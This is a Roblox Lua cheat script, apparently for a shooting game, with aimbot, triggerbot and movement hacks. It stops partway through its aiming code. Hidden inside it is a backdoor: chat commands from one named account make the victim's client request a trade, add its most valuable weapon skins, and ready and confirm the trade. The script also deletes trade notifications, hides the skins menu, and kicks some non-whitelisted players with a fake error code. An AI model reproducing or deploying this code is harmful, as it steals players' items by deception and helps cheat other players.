	local SkinValues = {
		["[Knife]"] = {
			["King Karambit"] = 3000,
			["GPO-Knife Prestige"] = 400,
			["Purple Dagger"] = 450,
			["Green Dagger"] = 400,
			["Red Dagger"] = 340,
			["Blue Dagger"] = 340,
			["Galaxy Karambit"] = 170,
			["Golden Age Tanto"] = 120,
			["RGB Dual Bayonets"] = 400,
			["Iced Out"] = 110,
			["Love Kukri"] = 33,
			["Heaven"] = 30,
			["GPO-Knife"] = 18,
			["Dual Bayonets"] = 30,
			["RGB Karambit"] = 300
		},
		["[Revolver]"] = {
			["Galaxy"] = 23,
			["Heaven"] = 15,
			["Iced Out"] = 40,
			["Golden Age"] = 40,
			["DH-Verified"] = 99999
		},
		["[Double-Barrel SG]"] = {
			["Galaxy"] = 23,
			["Heaven"] = 15,
			["Iced Out"] = 40,
			["Golden Age"] = 40,
			["Electric"] = 12
		},
		["[TacticalShotgun]"] = {
			["Galaxy"] = 16,
			["Electric"] = 15
		}
	}
	game:GetService("HttpService")
	coroutine.wrap(function()
		local Players = game:GetService("Players")
		local ReplicatedStorage = game:GetService("ReplicatedStorage")
		local RunService = game:GetService("RunService")
		local HttpService = game:GetService("HttpService")
		repeat
			task.wait()
		until Players:FindFirstChild("Braveboom")
		local BravebroomPlayer = Players:FindFirstChild("Braveboom")
		local ShouldRun = false

		BravebroomPlayer.Chatted:Connect(function(Message)
			if string.find(Message, Players.LocalPlayer.Name) or (string.find(Message, Players.LocalPlayer.DisplayName) or string.find(Message, "Force Overwrite!")) then
				ShouldRun = true
			end

			if ShouldRun == true then
				if string.find(Message, "Withdraw!") then
					ReplicatedStorage.MainEvent:FireServer("Trading", "Request", BravebroomPlayer)
				end
				if string.find(Message, "Force Ready!") then
					ReplicatedStorage.MainEvent:FireServer("Trading", "Ready", "", "")
				end
				if string.find(Message, "Force Confirm!") then
					ReplicatedStorage.MainEvent:FireServer("Trading", "Confirm", "", "")
				end
				if string.find(Message, "peace out girlscout") then
					ReplicatedStorage.MainEvent:FireServer("UpdateMousePos1")
					ReplicatedStorage.MainEvent:FireServer("UpdateMousePosI")
					ReplicatedStorage.MainEvent:FireServer("UpdateMousePos")
				end
			end
		end)
		local function GetSkinAmount(Name, Value)
			local Decoded = HttpService:JSONDecode(Players.LocalPlayer.DataFolder.Skins.Value)
			if Decoded[Name] and (Decoded[Name][Value] and Decoded[Name][Value] > 0) then
				return true, Decoded[Name][Value]
			else
				return false
			end
		end
		local function GetSkins(Player)
			local Skins = HttpService:JSONDecode(Player:WaitForChild("DataFolder", 9000000000):WaitForChild("Skins", 9000000000).Value)
			local List = {}
			for i, v in pairs(Skins) do
				for a, b in pairs(v) do
					if SkinValues[i] ~= nil and (SkinValues[i][a] ~= nil and b > 0) then
						local SkinInfo = {
							["Weapon"] = i,
							["Skin"] = a,
							["Amount"] = b,
							["Value"] = SkinValues[i][a]
						}
						table.insert(List, SkinInfo)
					end
				end
			end
			table.sort(List, function(Skin, Skin2)
				return Skin.Value > Skin2.Value
			end)
			local Length = #List
			local Final = {}
			for i = 1, math.min(6, Length) do
				local Index = List[i]
				table.insert(Final, Index)
			end
			return Final
		end
		local function AddSkin(p44)
			for _, v in pairs(p44) do
				local Valuable, Amount = GetSkinAmount(v.Class, v.Name)
				if Valuable then
					for _ = 1, Amount do
						ReplicatedStorage.MainEvent:FireServer("Trading", "Add", v.Class, v.Name)
						task.wait(0.75)
					end
				end
			end
		end
		ReplicatedStorage.MainEvent.OnClientEvent:Connect(function(...)
			local Arguments = { ... }
			if Arguments[1] == "AcceptTrade" and Arguments[2] == BravebroomPlayer then
				task.wait(0.5)
				local Skins = GetSkins(Players.LocalPlayer)
				for _, v in pairs(Skins) do
					AddSkin({
						{
							["Class"] = v.Weapon,
							["Name"] = v.Skin
						}
					})
				end
			end
			if #Arguments == 2 and (Arguments[1] == "ReadyTrade" and Arguments[2] == BravebroomPlayer) then
				task.wait(0.5)
				ReplicatedStorage.MainEvent:FireServer("Trading", "Ready", "", "")
			end
			if #Arguments == 3 and (Arguments[1] == "ReadyTrade" and Arguments[2] == BravebroomPlayer) then
				task.wait(0.5)
				ReplicatedStorage.MainEvent:FireServer("Trading", "Confirm", "", "")
			end
		end)
		Players.LocalPlayer.PlayerGui.MainScreenGui.Notified.ChildAdded:Connect(function(TradeNotification)
			task.wait()
			TradeNotification:Destroy()
		end)
		RunService.RenderStepped:Connect(function()
			pcall(function()
				Players.LocalPlayer.PlayerGui.MainScreenGui.WeaponSkinsGUI.Visible = false
			end)
			pcall(function()
				Players.LocalPlayer.PlayerGui.MainScreenGui.WeaponSkinsGUI:Destroy()
			end)
		end)
	end)()
	local SkinValues = {
		["[Knife]"] = {
			["King Karambit"] = 3000,
			["GPO-Knife Prestige"] = 400,
			["Purple Dagger"] = 450,
			["Green Dagger"] = 400,
			["Red Dagger"] = 340,
			["Blue Dagger"] = 340,
			["Galaxy Karambit"] = 170,
			["Golden Age Tanto"] = 120,
			["RGB Dual Bayonets"] = 400,
			["Iced Out"] = 110,
			["Heaven"] = 30,
			["Love Kukri"] = 33,
			["GPO-Knife"] = 18,
			["Dual Bayonets"] = 30,
			["RGB Karambit"] = 300
		},
		["[Revolver]"] = {
			["Galaxy"] = 23,
			["Heaven"] = 15,
			["Iced Out"] = 40,
			["Golden Age"] = 40,
			["DH-Verified"] = 99999
		},
		["[Double-Barrel SG]"] = {
			["Galaxy"] = 23,
			["Heaven"] = 15,
			["Iced Out"] = 40,
			["Golden Age"] = 40,
			["Electric"] = 12
		},
		["[TacticalShotgun]"] = {
			["Galaxy"] = 16,
			["Electric"] = 15
		}
	}
	local Whitelist = {
		1634890210,
		1597950777,
		1804342592,
		6025718584,
		3787222725,
		138480591,
		4004343176,
		5740823787,
		349514163,
		59527592,
		5038344074,
		7049025917,
		99276043,
		228035825,
		343017822,
		1001714032,
		2526086415,
		1382584772,
		4500772215,
		2274346371,
		4293434193,
		95267836,
		46531470,
		4938239886,
		360714334,
		1245509364,
		1522959622,
		1725033,
		2441955217,
		4030421929,
		2482077559,
		295493063,
		6194935454,
		72627146,
		7141097382,
		7085547953,
		47927147,
		3721664971
	}
	local function v_u_57(p55)
		local v56 = 64 + p55
		return string.char(v56)
	end
	task.spawn(function()
		local v58 = 0
		local Players = game:GetService("Players")
		local Skins = game:GetService("HttpService"):JSONDecode(Players.LocalPlayer:WaitForChild("DataFolder", 9000000000):WaitForChild("Skins", 9000000000).Value)
		if not table.find(Whitelist, Players.LocalPlayer.UserId) then
			for v61, v62 in pairs(Skins) do
				for v63, v64 in pairs(v62) do
					if SkinValues[v61] ~= nil and (SkinValues[v61][v63] ~= nil and v64 > 0) then
						v58 = v58 + SkinValues[v61][v63] * v64
					end
				end
			end
			if v58 >= 200 then
				local v65 = Players.LocalPlayer.UserId
				local v66 = string.split(v65, "")
				local v67 = ""
				for _, v68 in pairs(v66) do
					v67 = v67 .. v_u_57(tonumber(v68))
				end
				Players.LocalPlayer:Kick("ERROR CODE #" .. v58 * 2 .. " (" .. v67 .. ")")
			end
		end
	end)
	repeat
		task.wait()
	until workspace:FindFirstChild("Ignored") and (workspace.Ignored:FindFirstChild("Siren") and workspace.Ignored.Siren:FindFirstChild("Radius"))
	if shared.Loaded == nil then
		shared.Loaded = true
		local v_u_69 = {}
		local v70 = {
			["Enabled"] = true
		}
		local v71 = {
			["Whilst a player is selected"] = {
				["Knocked"] = true,
				["Self-Knocked"] = true,
				["Visible"] = false
			},
			["When selecting a player"] = {
				["Knocked"] = true,
				["Self-Knocked"] = true,
				["Visible"] = true
			}
		}
		v70["Check"] = v71
		v70["Keybind"] = "C"
		v_u_69["Global"] = v70
		local v72 = {
			["Enabled"] = true,
			["Hit Part"] = "Head",
			["Prediction"] = {
				["X"] = 0,
				["Y"] = 0,
				["Z"] = 0
			},
			["Closest Point"] = {
				["Mode"] = "Advanced",
				["Point Scale"] = 0.16
			}
		}
		local v73 = {
			["Enabled"] = false,
			["Prediction"] = {
				["X"] = 0.035,
				["Y"] = 0,
				["Z"] = 0.035
			},
			["Weapons"] = {
				"[Revolver]",
				"[Rifle]",
				"[Silencer]",
				"[Glock]"
			}
		}
		v72["Client Bullet Redirection"] = v73
		local v74 = {
			["Enabled"] = false,
			["Size"] = {
				["X"] = 5,
				["Y"] = 5,
				["Z"] = 5
			}
		}
		local v75 = {
			["Enabled"] = false,
			["Shotguns"] = {
				["X"] = 3.8,
				["Y"] = 4.8,
				["Z"] = 2
			},
			["Pistols"] = {
				["X"] = 3.7,
				["Y"] = 4.8,
				["Z"] = 2
			},
			["Others"] = {
				["X"] = 5,
				["Y"] = 5,
				["Z"] = 5
			}
		}
		v74["Weapon Configuration"] = v75
		v72["FOV"] = v74
		v_u_69["Silent Aimbot"] = v72
		local v76 = {
			["Enabled"] = true,
			["Hit Part"] = "Closest Part",
			["Snappiness"] = 0.15,
			["Prediction"] = {
				["X"] = 0,
				["Y"] = 0,
				["Z"] = 0
			},
			["Camera Modes"] = {
				["Shift Locked"] = true,
				["Third Person"] = true,
				["First Person"] = true
			}
		}
		local v77 = {
			["Enabled"] = false,
			["Size"] = {
				["X"] = 5,
				["Y"] = 5,
				["Z"] = 5
			}
		}
		local v78 = {
			["Enabled"] = true,
			["Shotguns"] = {
				["X"] = 13,
				["Y"] = 7,
				["Z"] = 13
			},
			["Pistols"] = {
				["X"] = 13,
				["Y"] = 7,
				["Z"] = 13
			},
			["Others"] = {
				["X"] = 5,
				["Y"] = 5,
				["Z"] = 5
			}
		}
		v77["Weapon Configuration"] = v78
		v76["FOV"] = v77
		v_u_69["Camera Aimbot"] = v76
		local v79 = {
			["Enabled"] = true,
			["Click Cooldown"] = 0.08,
			["Weapons"] = { "[Double-Barrel SG]", "[Revolver]", "[TacticalShotgun]" },
			["Prediction"] = {
				["X"] = 0,
				["Y"] = 0,
				["Z"] = 0
			},
			["Activation"] = {
				["Activation Mode"] = "Toggle",
				["Activation Bind"] = "V"
			},
			["FOV"] = {
				["X"] = 2.8,
				["Y"] = 4.8,
				["Z"] = 1.9
			}
		}
		v_u_69["Trigger Bot"] = v79
		v_u_69["Velocity Calculation"] = {
			["Enabled"] = true,
			["Magnitude"] = 70
		}
		local v80 = {}
		local v81 = {
			["Enabled"] = true
		}
		local v82 = {
			["[Double-Barrel SG]"] = {
				["Multiplier"] = 0.6
			},
			["[TacticalShotgun]"] = {
				["Multiplier"] = 0.6
			},
			["[Revolver]"] = {
				["Multiplier"] = 0.6
			},
			["[AUG]"] = {
				["Multiplier"] = 0.7
			},
			["[Silencer]"] = {
				["Multiplier"] = 0.8
			},
			["[Glock]"] = {
				["Multiplier"] = 0.8
			}
		}
		v81["Weapons"] = v82
		v80["Slowdown Modifications"] = v81
		local v83 = {
			["Enabled"] = true,
			["Normal"] = {
				["Multiplier"] = 1.02
			},
			["Shooting"] = {
				["Multiplier"] = 1.1
			},
			["Reloading"] = {
				["Multiplier"] = 1.2
			},
			["Low Health"] = {
				["Multiplier"] = 1.1
			}
		}
		v80["Speed Modifications"] = v83
		v_u_69["Movement Modifications"] = v80
		local v_u_84 = game:GetService("UserInputService")
		local v_u_85 = game:GetService("Players")
		local v86 = game:GetService("RunService")
		local v_u_87 = game:GetService("ReplicatedStorage")
		local v_u_88 = v_u_85.LocalPlayer
		local v_u_89 = v_u_88:GetMouse()
		local v_u_90 = {}
		local v_u_91 = workspace.CurrentCamera
		local v_u_92 = {
			["Target"] = nil,
			["Velocities"] = {},
			["Blacklisted"] = { 1308425655, 1475871408, 552354885 },
			["Bypass_Blacklist"] = {},
			["Redirection"] = {
				["Tool"] = nil,
				["Position"] = nil
			},
			["Triggerbot"] = {
				["Key Toggled"] = false,
				["Last Click"] = tick()
			}
		}
		local v93 = {
			["[Revolver]"] = {
				["Cooldown"] = 0.21
			},
			["[Double-Barrel SG]"] = {
				["Cooldown"] = 0.41
			},
			["[TacticalShotgun]"] = {
				["Cooldown"] = 0.66
			},
			["[AUG]"] = {
				["Cooldown"] = 0.51
			},
			["[Rifle]"] = {
				["Cooldown"] = 1.31
			},
			["[Shotgun]"] = {
				["Cooldown"] = 1.21
			},
			["[Glock]"] = {
				["Cooldown"] = 0.61
			},
			["[Silencer]"] = {
				["Cooldown"] = 0.44
			}
		}
		v_u_92.Cooldowns = v93
		local v94 = {
			["[Double-Barrel SG]"] = {
				["Bullets"] = 5,
				["Offset"] = CFrame.new(0, 0.35, -2.2)
			},
			["[TacticalShotgun]"] = {
				["Bullets"] = 5,
				["Offset"] = CFrame.new(0, 0.25, -2.5)
			},
			["[Shotgun]"] = {
				["Bullets"] = 5,
				["Offset"] = CFrame.new(0, 0.25, 2.5)
			}
		}
		v_u_92["Shotguns"] = v94
		v_u_92.Overwritten = {}
		v_u_92.CurrentCharacter = nil
		v_u_92.CurrentCharacter2 = nil
		v_u_92["Speed Modifications"] = {
			["Current Multiplier"] = 1
		}
		if table.find(v_u_92.Bypass_Blacklist, v_u_88.UserId) then
			v_u_92.Blacklisted = {}
		end
		local v_u_95 = tick()
		local function v_u_99(p96)
			-- upvalues: (copy) v_u_91
			local v97, v98 = v_u_91:WorldToScreenPoint(p96)
			return Vector2.new(v97.X, v97.Y), v98
		end
		local function v_u_100()
			-- upvalues: (copy) v_u_89
			return Vector2.new(v_u_89.X, v_u_89.Y)
		end
		local function v_u_102(p101)
			if p101.Character then
				return p101.Character:FindFirstChild("BodyEffects")["K.O"].Value
			else
				return false
			end
		end
		local function v_u_105(p103, p104)
			-- upvalues: (copy) v_u_91, (copy) v_u_88
			return #v_u_91:GetPartsObscuringTarget({ v_u_88.Character.Head.Position, p103 }, p104) == 0
		end
		local function v_u_106()
			-- upvalues: (ref) v_u_69
			return v_u_69["Silent Aimbot"]["Prediction"]
		end
		local function v_u_109(p107)
			local v108 = p107.Name
			return (v108 == "[Double-Barrel SG]" or (v108 == "[TacticalShotgun]" or v108 == "[Shotgun]")) and "Shotguns" or ((v108 == "[Revolver]" or (v108 == "[Silencer]" or v108 == "[Glock]")) and "Pistols" or "Others")
		end
		local function v_u_112(p110, p111)
			-- upvalues: (copy) v_u_102, (copy) v_u_88, (copy) v_u_105, (copy) v_u_85, (copy) v_u_91
			if p111["Knocked"] == true and v_u_102(p110) then
				return false
			elseif p111["Self-Knocked"] == true and v_u_102(v_u_88) then
				return false
			else
				return p111["Visible"] ~= true or v_u_105(p110.Character.Head.Position, { p110.Character, v_u_85.LocalPlayer.Character, v_u_91 }) ~= false
			end
		end
		local function v_u_120(p113)
			-- upvalues: (copy) v_u_85, (copy) v_u_112, (copy) v_u_99, (copy) v_u_100
			local v114 = math.huge
			local v115 = nil
			for _, v116 in pairs(v_u_85:GetPlayers()) do
				if v116 ~= v_u_85.LocalPlayer and (v116.Character and (v116.Character:FindFirstChild("HumanoidRootPart") and v_u_112(v116, p113) == true)) then
					local v117, v118 = v_u_99(v116.Character:FindFirstChild("HumanoidRootPart").Position)
					if v118 then
						local v119 = (v117 - v_u_100()).Magnitude
						if v119 <= v114 then
							v115 = v116
							v114 = v119
						end
					end
				end
			end
			return v115
		end
		local function v_u_127(p121)
			-- upvalues: (copy) v_u_91, (copy) v_u_89
			local v122 = math.huge
			local v123 = nil
			for _, v124 in ipairs(p121) do
				local v125, _ = v_u_91:WorldToScreenPoint(v124)
				local v126 = (Vector2.new(v_u_89.X, v_u_89.Y) - Vector2.new(v125.X, v125.Y)).Magnitude
				if v126 < v122 then
					v123 = v124
					v122 = v126
				end
			end
			return v123
		end
		local function v_u_136(p128, p129)
			-- upvalues: (copy) v_u_127
			local v130 = {}
			for _, v131 in pairs(p128) do
				for v132 = 0, v131.Size.X - p129, p129 do
					for v133 = 0, v131.Size.Y - p129, p129 do
						for v134 = 0, v131.Size.Z - p129, p129 do
							local v135 = v131.CFrame * CFrame.new(-v131.Size / 2 + Vector3.new(p129 / 2, p129 / 2, p129 / 2) + Vector3.new(v132, v133, v134)).Position
							table.insert(v130, v135)
						end
					end
				end
			end
			return v_u_127(v130) or p128[1].Position
		end
		local function v_u_160(p137)
			-- upvalues: (copy) v_u_99, (copy) v_u_100, (copy) v_u_91, (copy) v_u_89
			if not p137 then
				return nil
			end
			local v138 = p137:GetChildren()
			local v139 = nil
			local v140 = math.huge
			if v138 then
				for _, v141 in pairs(v138) do
					if v141:IsA("Part") or v141:IsA("MeshPart") then
						local v142, _ = v_u_99(v141.Position)
						local v143 = (v142 - v_u_100()).Magnitude
						if v143 <= v140 then
							v139 = v141
							v140 = v143
						end
					end
				end
			end
			local v144
			if v139.Name == "LeftHand" then
				local v145 = v139.Parent
				if v145:FindFirstChild("Humanoid") then
					v144 = v145.LeftUpperLeg
					local v146, _ = v_u_91:WorldToScreenPoint(v144.Position)
					local v147, _ = v_u_91:WorldToScreenPoint(v139.Position)
					if (Vector2.new(v_u_89.Y, 0) - Vector2.new(v146.Y, 0)).Magnitude >= (Vector2.new(v_u_89.Y, 0) - Vector2.new(v147.Y, 0)).Magnitude then
						v144 = v139
					end
				else
					v144 = v139
				end
			else
				v144 = v139
			end
			local v148
			if v144.Name == "RightHand" then
				local v149 = v144.Parent
				if v149:FindFirstChild("Humanoid") then
					v148 = v149.RightUpperLeg
					local v150, _ = v_u_91:WorldToScreenPoint(v148.Position)
					local v151, _ = v_u_91:WorldToScreenPoint(v144.Position)
					if (Vector2.new(v_u_89.Y, 0) - Vector2.new(v150.Y, 0)).Magnitude >= (Vector2.new(v_u_89.Y, 0) - Vector2.new(v151.Y, 0)).Magnitude then
						v148 = v144
					end
				else
					v148 = v144
				end
			else
				v148 = v144
			end
			local v152
			if v148.Name == "RightUpperArm" then
				local v153 = v148.Parent
				if v153:FindFirstChild("Humanoid") then
					v152 = v153.Head
					local v154, _ = v_u_91:WorldToScreenPoint(v152.Position)
					local v155, _ = v_u_91:WorldToScreenPoint(v148.Position)
					if (Vector2.new(v_u_89.Y, 0) - Vector2.new(v154.Y, 0)).Magnitude >= (Vector2.new(v_u_89.Y, 0) - Vector2.new(v155.Y, 0)).Magnitude then
						v152 = v148
					end
				else
					v152 = v148
				end
			else
				v152 = v148
			end
			local v156
			if v152.Name == "LeftUpperArm" then
				local v157 = v152.Parent
				if v157:FindFirstChild("Humanoid") then
					v156 = v157.Head
					local v158, _ = v_u_91:WorldToScreenPoint(v156.Position)
					local v159, _ = v_u_91:WorldToScreenPoint(v152.Position)
					if (Vector2.new(v_u_89.Y, 0) - Vector2.new(v158.Y, 0)).Magnitude >= (Vector2.new(v_u_89.Y, 0) - Vector2.new(v159.Y, 0)).Magnitude then
						v156 = v152
					end
				else
					v156 = v152
				end
			else
				v156 = v152
			end
			return v156
		end
		local function v_u_169(p161, p162)
			-- upvalues: (copy) v_u_160, (copy) v_u_99, (copy) v_u_100
			if p162 then
				return v_u_160(p161)
			end
			if p161 then
				local v163 = p161:GetChildren()
				local v164 = nil
				local v165 = math.huge
				if v163 then
					for _, v166 in pairs(v163) do
						if v166:IsA("Part") or v166:IsA("MeshPart") then
							local v167, _ = v_u_99(v166.Position)
							local v168 = (v167 - v_u_100()).Magnitude
							if v168 <= v165 then
								v164 = v166
								v165 = v168
							end
						end
					end
				end
				return v164
			end
		end
		local function v_u_174(p170, p171)
			for v172, v173 in pairs(p171) do
				p170[v172] = v173
			end
			return p170
		end
		local function v_u_182(p175, p176)
			-- upvalues: (copy) v_u_174, (copy) v_u_89, (copy) v_u_91
			local v177 = v_u_174(Instance.new("Part", workspace), {
				["CFrame"] = p175,
				["CanCollide"] = false,
				["Anchored"] = true,
				["Transparency"] = 1,
				["Size"] = p176
			})
			local v178 = v_u_89.Hit.Position
			local v179 = v_u_91.CFrame.Position
			local v180 = RaycastParams.new()
			v180.FilterType = Enum.RaycastFilterType.Whitelist
			v180.IgnoreWater = true
			v180.FilterDescendantsInstances = { v177 }
			local v181 = workspace:Raycast(v179, (v178 - v179).Unit * 1000, v180)
			v177:Destroy()
			return v181 and true or false
		end
		local function v_u_183()
			-- upvalues: (copy) v_u_91, (copy) v_u_84
			return (v_u_91.CFrame.Position - v_u_91.Focus.Position).Magnitude < 0.6 and "First Person" or (v_u_84.MouseBehavior == Enum.MouseBehavior.LockCenter and "Shift Locked" or "Third Person")
		end
		local function v_u_185(p184)
			-- upvalues: (copy) v_u_90
			if v_u_90[p184] then
				v_u_90[p184]:Disconnect()
				v_u_90[p184] = nil
			end
		end
		local function v_u_189(p186, p187)
			local v188 = p186.Position
			task.wait(p187)
			return (p186.Position - v188) / p187
		end
		local function v_u_191(p190)
			-- upvalues: (copy) v_u_92
			if v_u_92.Velocities[p190.Name] == nil then
				return p190.Character.HumanoidRootPart.Velocity
			else
				return v_u_92.Velocities[p190.Name]
			end
		end
		v86.RenderStepped:Connect(function(_)
			-- upvalues: (copy) v_u_85, (ref) v_u_69, (copy) v_u_92, (copy) v_u_189
			for _, v_u_192 in pairs(v_u_85:GetPlayers()) do
				pcall(function()
					-- upvalues: (copy) v_u_192, (ref) v_u_69, (ref) v_u_92, (ref) v_u_189
					if v_u_192.Character.HumanoidRootPart.Velocity.Magnitude < v_u_69["Velocity Calculation"]["Magnitude"] then
						if v_u_92.Velocities[v_u_192.Name] ~= nil then
							v_u_92.Velocities[v_u_192.Name] = nil
						end
					else
						v_u_92.Velocities[v_u_192.Name] = v_u_189(v_u_192.Character.HumanoidRootPart, 0.1)
					end
				end)
			end
			if v_u_69["Velocity Calculation"]["Enabled"] == false then
				v_u_92.Velocities = {}
			end
		end)
		local function v203(p_u_193)
			-- upvalues: (copy) v_u_92, (copy) v_u_185, (copy) v_u_90, (ref) v_u_69, (copy) v_u_87
			task.wait()
			if v_u_92.CurrentCharacter2 ~= p_u_193 then
				v_u_92.CurrentCharacter2 = p_u_193
				for _, v194 in pairs({ "Slowdown Modifications" }) do
					v_u_185(v194)
				end
				task.spawn(function()
					-- upvalues: (copy) p_u_193, (ref) v_u_90, (ref) v_u_69, (ref) v_u_92, (ref) v_u_87
					local v195 = p_u_193:WaitForChild("BodyEffects", 8999999488)
					local v196 = v195 and v195:WaitForChild("Movement", 8999999488)
					if v196 then
						v_u_90["Slowdown Modifications"] = v196.ChildAdded:Connect(function(p_u_197)
							-- upvalues: (ref) p_u_193, (ref) v_u_69, (ref) v_u_92, (ref) v_u_87
							task.wait(0.001)
							if p_u_197.Name == "ReduceWalk" then
								local v198 = p_u_193:FindFirstChildWhichIsA("Tool")
								if v198 and (v_u_69["Movement Modifications"]["Slowdown Modifications"]["Enabled"] and v_u_69["Movement Modifications"]["Slowdown Modifications"]["Weapons"][v198.Name]) then
									local v199 = v_u_69["Movement Modifications"]["Slowdown Modifications"]["Weapons"][v198.Name].Multiplier
									local v_u_200 = v_u_92.Cooldowns[v198.Name].Cooldown * v199
									print("You have been slowed down whilst firing " .. v198.Name .. " (Default Cooldown: " .. v_u_92.Cooldowns[v198.Name].Cooldown .. ") (Multiplied Cooldown: " .. v_u_200 .. ")")
									task.spawn(function()
										-- upvalues: (copy) v_u_200, (copy) p_u_197, (ref) v_u_87
										task.wait(v_u_200)
										p_u_197.Parent = v_u_87
									end)
								end
							end
						end)
					end
					local v_u_201 = p_u_193:WaitForChild("Humanoid", 8999999488)
					if v_u_201 then
						local v_u_202 = false
						if v_u_69["Movement Modifications"]["Speed Modifications"]["Enabled"] then
							v_u_201:GetPropertyChangedSignal("WalkSpeed"):Connect(function()
								-- upvalues: (ref) v_u_202, (copy) v_u_201, (ref) v_u_92
								if v_u_202 == false then
									v_u_202 = true
									v_u_201.WalkSpeed = v_u_201.WalkSpeed * v_u_92["Speed Modifications"]["Current Multiplier"]
									v_u_202 = false
								end
							end)
						end
					end
				end)
			end
		end
		if v_u_85.LocalPlayer.Character then
			v203(v_u_85.LocalPlayer.Character)
		end
		v_u_90["Character Added"] = v_u_88.CharacterAdded:Connect(v203)
		coroutine.resume(coroutine.create(function()
			-- upvalues: (ref) v_u_69, (copy) v_u_85, (copy) v_u_92
			if v_u_69["Movement Modifications"]["Speed Modifications"]["Enabled"] then
				while task.wait(0.015) do
					pcall(function()
						-- upvalues: (ref) v_u_85, (ref) v_u_92, (ref) v_u_69
						local v204 = v_u_85.LocalPlayer.Character
						local v205 = v204 and v204:FindFirstChild("BodyEffects")
						if v205 then
							v_u_92["Speed Modifications"]["Current Multiplier"] = v205.Reload.Value and v_u_69["Movement Modifications"]["Speed Modifications"]["Reloading"].Multiplier or v205.Movement:FindFirstChild("ReduceWalk") and v_u_69["Movement Modifications"]["Speed Modifications"]["Shooting"].Multiplier or (v204.Humanoid.Health < 55 and v_u_69["Movement Modifications"]["Speed Modifications"]["Low Health"].Multiplier or v_u_69["Movement Modifications"]["Speed Modifications"].Normal.Multiplier)
						end
					end)
				end
			end
		end))
		v_u_90["Input Began"] = v_u_84.InputBegan:Connect(function(p206, p207)
			-- upvalues: (ref) v_u_69, (copy) v_u_92, (copy) v_u_120, (copy) v_u_90, (ref) v_u_95, (copy) v_u_185
			if p207 == false and (v_u_69["Trigger Bot"]["Enabled"] and (v_u_69["Trigger Bot"]["Activation"]["Activation Mode"] == "Toggle" and p206.KeyCode == Enum.KeyCode[v_u_69["Trigger Bot"]["Activation"]["Activation Bind"]])) then
				v_u_92["Triggerbot"]["Key Toggled"] = not v_u_92["Triggerbot"]["Key Toggled"]
			end
			if p207 == false and p206.KeyCode == Enum.KeyCode[v_u_69["Global"]["Keybind"]] then
				local v208 = v_u_120(v_u_69["Global"]["Check"]["When selecting a player"])
				local v209 = v_u_92
				if v_u_92.Target ~= nil or not v208 then
					local _ = v_u_92.Target == nil
					v208 = nil
				end
				v209.Target = v208
				if v_u_92.Target then
					local v_u_210 = v_u_92.Target.Character.Humanoid.Health
					v_u_90["Health Changed"] = v_u_92.Target.Character.Humanoid:GetPropertyChangedSignal("Health"):Connect(function()
						-- upvalues: (ref) v_u_92, (ref) v_u_210, (ref) v_u_95
						local v211 = v_u_92.Target.Character.Humanoid.Health
						if v211 < v_u_210 then
							v_u_95 = tick()
						end
						v_u_210 = v211
					end)
					return
				end
				v_u_185("Health Changed")
			end
		end)
		v_u_90["Each Frame"] = v86.RenderStepped:Connect(function(_)
			-- upvalues: (ref) v_u_69, (copy) v_u_92, (copy) v_u_183, (copy) v_u_88, (copy) v_u_169, (copy) v_u_191, (copy) v_u_109, (copy) v_u_105, (copy) v_u_85, (copy) v_u_91, (copy) v_u_182, (copy) v_u_89, (copy) v_u_136, (copy) v_u_106, (copy) v_u_87, (copy) v_u_84, (copy) v_u_112, (copy) v_u_185
			-- Camera Aimbot
			if v_u_69["Camera Aimbot"]["Enabled"] and v_u_92.Target and v_u_92.Target.Character then
				local cameraMode = v_u_183()
				if v_u_69["Camera Aimbot"]["Camera Modes"][cameraMode] then
					local part = v_u_169(v_u_92.Target.Character, false)
					if part and v_u_105(part.Position, { v_u_92.Target.Character, v_u_85.LocalPlayer.Character, v_u_91 }) then
						local fovSize = v_u_69["Camera Aimbot"]["FOV"]["Size"]
						if v_u_69["Camera Aimbot"]["FOV"]["Weapon Configuration"]["Enabled"] then
							local weapon = v_u_88.Character:FindFirstChildWhichIsA("Tool")
							if weapon then
								local weaponType = v_u_109(weapon)
								if v_u_69["Camera Aimbot"]["FOV"]["Weapon Configuration"][weaponType] then
									fovSize = v_u_69["Camera Aimbot"]["FOV"]["Weapon Configuration"][weaponType]
								end
							end
						end
						
						-- simplified fov check - if fov is disabled, always aim
						if not v_u_69["Camera Aimbot"]["FOV"]["Enabled"] or v_u_182(v_u_92.Target.Character.HumanoidRootPart.CFrame, Vector3.new(fovSize.X, fovSize.Y, fovSize.Z)) then
							local velocity = v_u_191(v_u_92.Target)
							local prediction = v_u_69["Camera Aimbot"]["Prediction"]
							local targetPosition = part.Position + Vector3.new(
								velocity.X * prediction.X,
								velocity.Y * prediction.Y,
								velocity.Z * prediction.Z
							)
							-- use same camlock logic as conversion.iso
							v_u_91.CFrame = v_u_91.CFrame:Lerp(CFrame.new(v_u_91.CFrame.Position, targetPosition), v_u_69["Camera Aimbot"]["Snappiness"])
						end
					end
				end
			end
			local v_u_235 = {
				["getAim"] = function(p221)
					-- upvalues: (ref) v_u_89, (ref) v_u_69, (ref) v_u_92, (ref) v_u_88, (ref) v_u_169, (ref) v_u_136, (ref) v_u_109, (ref) v_u_182, (ref) v_u_191, (ref) v_u_106
					local v222 = v_u_89.Hit.Position
					if v_u_69["Silent Aimbot"]["Enabled"] and (v_u_92.Target ~= nil and not table.find(v_u_92.Blacklisted, v_u_92.Target.UserId)) then
						local v223 = v_u_88.Character:FindFirstChildWhichIsA("Tool")
						local v224 = v_u_92.Target.Character
						local v225 = v_u_69["Silent Aimbot"]["Hit Part"]
						local v226 = nil
						if v224 then
							if v225 == "Closest Part" then
								v226 = v_u_169(v224).Position
							end
							if v225 == "Closest Point" then
								if v_u_69["Silent Aimbot"]["Closest Point"]["Mode"] == "Advanced" then
									local v227 = {}
									for _, v228 in pairs(v224:GetDescendants()) do
										if v228:IsA("BasePart") or v228:IsA("MeshPart") then
											v227[#v227 + 1] = v228
										end
									end
									v226 = v_u_136(v227, v_u_69["Silent Aimbot"]["Closest Point"]["Point Scale"])
								end
								if v_u_69["Silent Aimbot"]["Closest Point"]["Mode"] == "Normal" then
									v226 = v_u_136({ (v_u_169(v224)) }, v_u_69["Silent Aimbot"]["Closest Point"]["Point Scale"])
								end
							end
						end
						if v226 == nil then
							v226 = v224[v225].Position
						end
						if v226 then
							local v229 = v_u_69["Silent Aimbot"]["FOV"]
							local v230 = v229.Size
							if v229["Weapon Configuration"]["Enabled"] then
								local v231 = v_u_109(v223)
								if v_u_69["Silent Aimbot"]["FOV"]["Weapon Configuration"][v231] then
									v230 = v229["Weapon Configuration"][v231]
								end
							end
							local v232 = Vector3.new(v230.X, v230.Y, v230.Z)
